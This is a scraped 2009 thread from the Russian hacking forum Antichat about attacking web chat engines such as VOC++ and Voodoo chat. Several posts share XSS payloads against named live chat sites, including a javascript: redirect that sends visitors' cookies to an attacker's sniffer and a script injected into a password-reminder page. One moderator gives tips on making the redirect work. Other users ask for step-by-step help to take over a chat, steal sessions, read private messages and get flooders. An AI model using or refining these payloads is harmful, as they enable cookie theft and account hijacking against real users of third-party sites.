ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #241  
Старый 26.02.2009, 07:48
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от gold_555  
У меня хоть и не большие познания в javascript могу я следующим образом получить куки пользователя:

Кидаю к примеру ссыль юзеру в чат http://site.ru/file.html

file.html содержит следующий код
PHP код:
<a href="http://chatname.ru/go.php?url=javascript:window.location.href='http://site.ru/sniffer/'">Click</a
Т.е смысл следующий юзер щелкает по ссылке и переходит по адрксу http://site.ru/file.html, оттуда он переадресуется на страницу чата http://chatname.ru/go.php, выполняется java script по переходу на страницу со снифером, снифер читает куки

Такое реально???
Правильнее будет на снифере сделать переадресацию
Когда юзер уже зайдёт на него
 
Ответить с цитированием

  #242  
Старый 05.05.2009, 11:46
.-=:KiLLing:=-.
Познающий
Регистрация: 04.05.2009
Сообщений: 41
Провел на форуме:
447693

Репутация: 16
По умолчанию

так для VOC++ никто ничего существенного и не нашёл?
VOC++ рулит!
 
Ответить с цитированием

  #243  
Старый 15.05.2009, 22:35
.-=:KiLLing:=-.
Познающий
Регистрация: 04.05.2009
Сообщений: 41
Провел на форуме:
447693

Репутация: 16
По умолчанию

а флудера так и нет рабочего? на Voc++ бизнес едишен ни 1 флудер из сдешних неработает) ещё недавно гдето тут был программой (не скриптом) флудер! работал ещё! сейчас зашёл хотел приколоться в стареньком чате) ан нет! тоже не работает)))) ну что мож кто что подскажет?
 
Ответить с цитированием

  #244  
Старый 10.06.2009, 21:30
Flair
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226

Репутация: 38
По умолчанию

вот xss
http://****.ru/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
вот снифер
_http://Flair.ezar.ru/sniff/s.gif
че терь нада сделать, какую ссылку нада сгенерировать чтобы, когда на нее зайдут мне в снифер пришли куки и т.д
напишите пожалуйста правельную ссылку чтобы xss работала )
 
Ответить с цитированием

  #245  
Старый 10.06.2009, 22:01
neval
Moderator - Level 7
Регистрация: 13.12.2006
Сообщений: 531
Провел на форуме:
2127116

Репутация: 383


По умолчанию

Цитата:
Сообщение от .-=:KiLLing:=-.  
так для VOC++ никто ничего существенного и не нашёл?
VOC++ рулит!
Морально и технически устаревший код, который предприимчивые кодеры из креатив десинг обвешали модами, внеся еще большую путаницу в код, который не работает с большей частью броузеров рулит?

Чат устарел, дописывания для него модов уже неперспективное занятие, его только переписывать заново с учетом возможностей php5 и ajax.
 
Ответить с цитированием

  #246  
Старый 21.06.2009, 14:01
g.moralez
Новичок
Регистрация: 20.06.2009
Сообщений: 1
Провел на форуме:
5699

Репутация: 0
По умолчанию

здраствуйте)....нужна помощь...http://chat.shadrinsk.net/ -хочу заиметь права
на нём есть дырка- http://chat.shadrinsk.net./password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN%20test/);%3C/script%3E
перечитал кучу страниц инфы здесь, в голове образовалась каша , думаю позже рассасётся)
а пока потскажите пошагово какие действия предпринять?
 
Ответить с цитированием

  #247  
Старый 30.06.2009, 17:07
No_smoking
Новичок
Регистрация: 30.06.2009
Сообщений: 1
Провел на форуме:
2456

Репутация: 0
По умолчанию

Здравствуйте, товарищи.
Кто-нить может дать попользовацца флудером для voodoo-chat?
Конкретно для этого http://chat.flirt.ru/ - по некоторым данным это первый чат на движке voodoo, созданный Владом Востых. Типа чат-прототип. Я там давно тусуюсь, чат старый, без админов и модеров и какого-либо контроля.
В первую очередь интересует "мозгодёр" с входом-выходом, который уже несколько дней кто-то в этом чате применяет.
 
Ответить с цитированием

яяяяяяя
  #248  
Старый 28.08.2009, 11:11
denisov21g21
Banned
Регистрация: 01.07.2009
Сообщений: 21
Провел на форуме:
38138

Репутация: -5
По умолчанию яяяяяяя

служба поддержки VDS manager
591-493-245
 
Ответить с цитированием

  #249  
Старый 13.09.2009, 13:52
KiloN
Новичок
Регистрация: 12.09.2009
Сообщений: 3
Провел на форуме:
25123

Репутация: -5
По умолчанию

Всем привет!
Помогите взломать вот этот чат: http://www.strezhi.ru/chat/

Там есть два способа!
Залесть в инфу: http://www.strezhi.ru/chat/user_info.php?session=
И читать приваты: http://www.strezhi.ru:9014/?

Пробовал всё работает, только вот проблемма, сессии то не все дают... т.е. не у всех её выпросишь...
Вообщем-то у меня такой вопрос: Как можно заполучить сессию на этом чате, не прося её и такое вообще возможно?!

Последний раз редактировалось KiloN; 13.09.2009 в 13:55..
 
Ответить с цитированием

всем привет
  #250  
Старый 13.09.2009, 14:49
матрица
Новичок
Регистрация: 09.09.2009
Сообщений: 5
Провел на форуме:
16980

Репутация: 0
По умолчанию всем привет

помагите найти слабые места в чате chat.waw.su .заранее спасибо буду рад любым предложениям

Последний раз редактировалось матрица; 14.09.2009 в 13:24..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
voodoo уязвимость при банне JRX Чаты 6 19.11.2006 01:42
Привет парни помогите с Voodoo чат chat.tus.ru Spider_Klim Чаты 3 27.07.2006 09:48
Чаты августа ломаются ? SEVKA Чаты 123 25.05.2006 10:50
Voodoo chat Guest Чаты 8 08.07.2005 12:01
VooDoo чаты Spectrum Чаты 6 16.05.2005 20:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ